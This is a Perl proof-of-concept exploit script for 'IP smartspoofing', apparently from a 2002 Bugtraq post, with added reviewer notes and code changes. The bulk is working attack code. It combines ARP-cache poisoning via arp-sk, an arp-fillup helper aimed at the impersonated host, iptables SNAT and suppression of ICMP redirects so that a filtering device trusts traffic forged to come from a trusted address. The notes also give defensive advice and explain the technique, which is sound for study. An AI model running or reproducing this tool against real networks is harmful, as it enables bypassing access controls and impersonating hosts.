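#!/usr/bin/perl -w
#
# smartspoof.pl
#
# This script is provided as proof of concept for educational purpose only
#
# Laurent Licour 28/10/02
# llicour@althes.fr
# Althes (http://www.althes.fr)
#
# Start/Stop smartspoofing
# http://www.althes.fr/ressources/avis/smartspoofing.htm
#
# Require linux 2.4 (tested on Redhat 7.3)
# Require NetAddr::IP perl package (www.cpan.org)
# Require arp-sk tool (www.arp-sk.org)
# Require arp-fillup tool (www.althes.fr/ressources/avis/smartspoofing.htm)
# Require iptables (www.iptables.org)

=pod

=head1 ANNOUNCEMENT (original Bugtraq post, lightly edited)

Hello,

As we reported in our previous article, IP Smartspoofing
(http://www.althes.fr/ressources/avis/smartspoofing.htm), we introduced a
new method for IP spoofing that allows a full TCP connection from any client
software.  The exploit code smartspoof.pl is a proof of concept (for
educational purposes only) of the Smart Spoofing method.  The additional
software "arp-fillup" is necessary to achieve this:
http://www.althes.fr/ressources/tools/arp-fillup/arp-fillup-0.1.tgz

These tools are also available on
http://www.althes.fr/ressources/avis/smartspoofing.htm#tools

Exploit Code (perl source) follows.

=head1 WHAT THE SCRIPT DOES (reviewer notes)

With C<-start> the host running this script becomes a transparent relay
for one trusted address SRC (C<-S>) toward a filtering device DST (C<-D>):

=over 4

=item 1.

IPv4 forwarding is switched on (/proc/sys/net/ipv4/ip_forward), so clients
behind this host are relayed too (the usage text relies on that).

=item 2.

C<arp-fillup -i IFACE -D SRC> is started in the background against the
host being impersonated.  What it does is not visible in this file; from
its name and the article it presumably keeps that host's ARP handling busy
so the address conflict goes unnoticed - confirm against the arp-fillup
source before relying on that description.

=item 3.

An iptables SNAT rule rewrites the source of everything leaving IFACE for
DST to SRC, so the filtering device sees the trusted address.

=item 4.

Outgoing ICMP host-redirects from this host are dropped, presumably so the
local kernel cannot tell the poisoned neighbour about the real route and
undo step 5.

=item 5.

C<arp-sk> sends one ARP request and then a continuous stream of ARP
replies to the next hop toward DST, claiming the IP of the next hop toward
SRC.  No MAC is given, so arp-sk fills in this host's own MAC (the C<-stop>
path's explicit C<IP:MAC> form shows the syntax for overriding it); the
neighbour therefore delivers the return traffic for SRC here.  When SRC and
DST are directly connected, get_ip_next_hop returns the address itself
(gateway 0.0.0.0 case) and the target is poisoned directly.

=back

C<-stop> reverses this: kills the helpers, sends one corrective ARP reply
carrying the next hop's real MAC, deletes exactly the two iptables rules
added above and disables forwarding.

Notes for defenders: this is ARP-cache poisoning plus NAT.  It needs the
attacker on the same segment as the next hop toward the target, and a
filtering device that trusts source IP addresses - which is the article's
point: source-address trust is not authentication.  Dynamic ARP Inspection
or static ARP entries on the gateway limit the poisoning step.

Changes relative to the posted version: command-line values are validated
as IPv4 literals / interface names and every external command is run
without a shell; C<-stop> no longer restarts the whole iptables service
(which flushed every rule on the host) but removes only the rules it added;
a failed C<route -n>, a missing route, an unresolved MAC and running as
non-root are reported instead of silently leaving the host half
configured.  C<route -n> is the net-tools command; on systems without it,
adapt get_ip_next_hop to C<ip route>.

=cut

use strict;
use warnings;
use Getopt::Long;
use NetAddr::IP;

# Dotted-quad IPv4 literal and Linux interface name.  Every value that ends
# up in an argv for arp-sk / arp-fillup / iptables must match one of these.
my $IPV4_RE  = qr/\A(?:(?:25[0-5]|2[0-4][0-9]|1?[0-9]?[0-9])\.){3}(?:25[0-5]|2[0-4][0-9]|1?[0-9]?[0-9])\z/;
my $IFACE_RE = qr/\A[A-Za-z0-9_.:-]{1,15}\z/;

# Run @cmd in the foreground without a shell.  A failure is reported but is
# not fatal, so a partially applied -start can still be undone by -stop.
sub run_cmd {
    my @cmd = @_;
    my $rc = system(@cmd);
    warn "Warning : '@cmd' failed (status $?)\n" if $rc != 0;
    return $rc == 0;
}

# Start @cmd in the background with stdout/stderr discarded (the posted
# version used "cmd >/dev/null 2>&1 &" through the shell).  Returns the
# child's pid; the child exits 127 if exec fails.
sub spawn_quiet {
    my @cmd = @_;
    my $pid = fork();
    die "Error : fork failed: $!\n" unless defined $pid;
    return $pid if $pid;                     # parent
    open(STDOUT, '>', '/dev/null');
    open(STDERR, '>', '/dev/null');
    exec { $cmd[0] } @cmd or exit 127;
}

# Like spawn_quiet but waits for the command; true when it exited 0.
sub run_quiet {
    my $pid = spawn_quiet(@_);
    waitpid($pid, 0);
    return $? == 0;
}

# Write 0/1 to the ip_forward sysctl directly (checked, no shell).
sub set_ip_forward {
    my ($value) = @_;
    my $path = '/proc/sys/net/ipv4/ip_forward';
    open(my $fh, '>', $path) or die "Error : Cannot open $path: $!\n";
    print {$fh} "$value\n";
    close($fh) or die "Error : Cannot write $path: $!\n";
    return;
}

# Find the next hop and outgoing interface for $ip0 by longest-prefix match
# over the kernel routing table as printed by `route -n`.
#
#   $ip0 - dotted-quad IPv4 address
#   $int - scalar ref that receives the interface name of the chosen route
#
# Returns the gateway address.  For a directly connected route (gateway
# 0.0.0.0) the destination itself is returned: the ARP poisoning is then
# aimed at the target host rather than at a router.  Dies when route -n
# cannot be run or no route matches.
sub get_ip_next_hop {
    my ($ip0, $int) = @_;
    my $ip = NetAddr::IP->new($ip0)
        or die "Error : Invalid address $ip0\n";

    # Three-arg pipe open: no shell, and the failure is checked.
    open(my $route_fh, '-|', 'route', '-n')
        or die "Error : Cannot run route -n: $!\n";

    my ($gateway, $masklen, $iface) = ('', -1, '');
    while (my $line = <$route_fh>) {
        chomp $line;
        my @fields = split /\s+/, $line;
        # Skips the two header lines and anything that is not a numeric
        # Destination / Gateway / Genmask / ... / Iface row.
        next unless @fields >= 8
            and $fields[0] =~ $IPV4_RE
            and $fields[2] =~ $IPV4_RE;
        my $entry = NetAddr::IP->new("$fields[0]/$fields[2]") or next;
        next unless $entry->contains($ip);
        # Longest prefix wins; on equal length the first row is kept.
        if ($entry->masklen() > $masklen) {
            ($gateway, $masklen, $iface) = ($fields[1], $entry->masklen(), $fields[7]);
        }
    }
    close($route_fh);

    die "Error : No route for $ip \n" if $gateway eq '';
    $$int = $iface;
    return $gateway eq '0.0.0.0' ? $ip->addr() : $gateway;
}

# Resolve the MAC of $ip through the local ARP cache (/proc/net/arp),
# pinging once first so the kernel has populated the entry.  Returns the
# empty string when no complete entry exists.
sub get_mac {
    my ($ip) = @_;
    die "Error : Invalid address $ip\n" unless $ip =~ $IPV4_RE;

    run_quiet('ping', '-c', '1', '-w', '1', $ip);

    my $path = '/proc/net/arp';
    open(my $arp_fh, '<', $path) or die "Error : Cannot read $path: $!\n";
    my $mac = '';
    while (my $line = <$arp_fh>) {
        # Columns: IP address, HW type, Flags, HW address, Mask, Device.
        my @f = split /\s+/, $line;
        next unless @f >= 4 and $f[0] eq $ip;
        # Flag 0x2 (ATF_COM) marks a completed entry; an incomplete one
        # shows 00:00:00:00:00:00 and must not be sent out as the "real" MAC.
        next unless $f[2] =~ /\A0x[0-9a-fA-F]+\z/ and (hex($f[2]) & 0x2);
        $mac = $f[3];
        last;
    }
    close($arp_fh);
    return $mac;
}

# Print the help text and exit 0.
sub usage {
    print "Start/Stop de smartspoofing\n\n";
    print "This is the proof of concept of the smartspoofing technique\n";
    print "(visit http://www.althes.fr/ressources/avis/smartspoofing.htm)\n";
    print "\n";
    print "You only have to specify :\n";
    print " -D : address of the filtering equipement to connect to\n";
    print " -S : address of the trusted host to spoof\n";
    print "\n";
    print "Then, you only need to launch your favorite client software from this host\n";
    print "or any host behind this (because it is now a router)\n";
    print "\n";
    print "This script is provided as proof of concept for educational purpose only.\n";
    print "\n";
    exit 0;
}

my $syntax = "syntax: $0 [-i eth0] [-h] [-v] -D <\@IP destination> -S <\@IP source> -start|-stop\n";
my $ver    = "smartspoof.pl v1.0 28/10/02\n";

my ($ipsrc, $ipdst);
my ($start, $stop);
my $interface = "";
my ($version, $help);

Getopt::Long::GetOptions(
    "D=s"   => \$ipdst,
    "S=s"   => \$ipsrc,
    "i=s"   => \$interface,
    "v"     => \$version,
    "h"     => \$help,
    "start" => \$start,
    "stop"  => \$stop,
) or die $syntax;

usage() if $help;
die $ver if $version;
die $syntax unless @ARGV == 0;
die $syntax unless defined($ipsrc) and defined($ipdst);
die $syntax unless defined($start) or defined($stop);
die $syntax if $start and $stop;

# Everything below hands these values to external programs: whitelist them.
die "Error : -S must be an IPv4 address, not '$ipsrc'\n" unless $ipsrc =~ $IPV4_RE;
die "Error : -D must be an IPv4 address, not '$ipdst'\n" unless $ipdst =~ $IPV4_RE;
die "Error : -i must be an interface name, not '$interface'\n"
    if $interface ne "" and $interface !~ $IFACE_RE;
# ip_forward, iptables and arp-sk all need root; the posted version let the
# individual commands fail quietly instead.
die "Error : must be run as root\n" if $> != 0;

# Only the interface toward the destination is used; $intsrc is kept for
# symmetry with get_ip_next_hop's interface.
my ($intsrc, $intdst);
my $ipsrc_next_hop = get_ip_next_hop($ipsrc, \$intsrc);
my $ipdst_next_hop = get_ip_next_hop($ipdst, \$intdst);
$interface = $intdst if $interface eq "";
die "Error : bad interface name '$interface' in routing table\n"
    unless $interface =~ $IFACE_RE;

# Exactly the rules -start adds; -stop removes these and nothing else
# (the posted version did "service iptables stop/start", flushing the host's
# whole firewall policy).
my @snat_rule    = ('POSTROUTING', '-o', $interface, '-d', $ipdst, '-j', 'SNAT', '--to', $ipsrc);
my @noredir_rule = ('OUTPUT', '-p', 'icmp', '--icmp-type', 'host-redirect', '-j', 'DROP');

if ($start) {
    print "Activate IP Forwarding\n";
    set_ip_forward(1);

    print "Activate Arp fillup on $ipsrc\n";
    spawn_quiet('arp-fillup', '-i', $interface, '-D', $ipsrc);

    print "Set NAT rule on iptables\n";
    run_cmd('iptables', '-t', 'nat', '-A', @snat_rule);

    print "Desactivate ICMP Redirect\n";
    run_cmd('iptables', '-A', @noredir_rule);

    print "Activate Arp cache poisoning of $ipsrc_next_hop entry on $ipdst_next_hop on $interface\n";
    # One who-has seeds the neighbour's cache; the background stream of
    # replies keeps the poisoned entry from expiring.
    run_quiet('arp-sk', '-w', '-i', $interface, '-d', $ipdst_next_hop,
              '-S', $ipsrc_next_hop, '-D', $ipdst_next_hop, '-c', '1');
    spawn_quiet('arp-sk', '-r', '-i', $interface, '-d', $ipdst_next_hop,
                '-S', $ipsrc_next_hop, '-D', $ipdst_next_hop);
}
elsif ($stop) {
    print "Suppress Arp fillup on $ipsrc\n";
    run_cmd('killall', 'arp-fillup');        # every arp-fillup, as before

    print "Suppress Arp cache poisoning of $ipsrc_next_hop entry on $ipdst_next_hop\n";
    run_cmd('killall', 'arp-sk');
    my $mac = get_mac($ipsrc_next_hop);
    if ($mac eq "") {
        # Sending "-S ip:" with an empty MAC would only corrupt the entry further.
        warn "Warning : cannot resolve MAC of $ipsrc_next_hop; ARP cache of $ipdst_next_hop left poisoned\n";
    }
    else {
        # One reply carrying the real MAC puts the neighbour's entry back.
        run_quiet('arp-sk', '-r', '-c', '1', '-i', $interface, '-d', $ipdst_next_hop,
                  '-S', "$ipsrc_next_hop:$mac", '-D', $ipdst_next_hop);
    }

    print "Clear iptables rules\n";
    run_cmd('iptables', '-t', 'nat', '-D', @snat_rule);
    run_cmd('iptables', '-D', @noredir_rule);

    print "Desactivate ip forwarding\n";
    set_ip_forward(0);
}

__END__

Regards

Laurent Licour
mailto:llicour@althes.fr
Althes
http://www.althes.fr

*---------------------------------------------------------------*
* Cet e-mail et toutes les pièces jointes sont destinés aux     *
* seules personnes auxquelles ils sont spécifiquement adressés  *
* et n'engagent que le signataire de ces documents et non la    *
* structure dont il dépend.                                     *
* Leur existence et leur contenu ont un caractère confidentiel. *
* Toute utilisation ou diffusion non autorisée est interdite.   *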
* Si vous avez reçu cet e-mail ou si vous détenez sans en être   *
* le destinataire, nous vous demandons de bien vouloir nous en   *
* informer immédiatement.                                        *
* Cette note assure que ce message a été contrôlé et ne          *
* comprenait aucun virus connu à ce jour, néanmoins tout         *
* message électronique est susceptible d'altération.             *
* Nous déclinons toute responsabilité au titre de ce message     *
* s'il a été altéré, déformé ou falsifié.                        *
*---------------------------------------------------------------*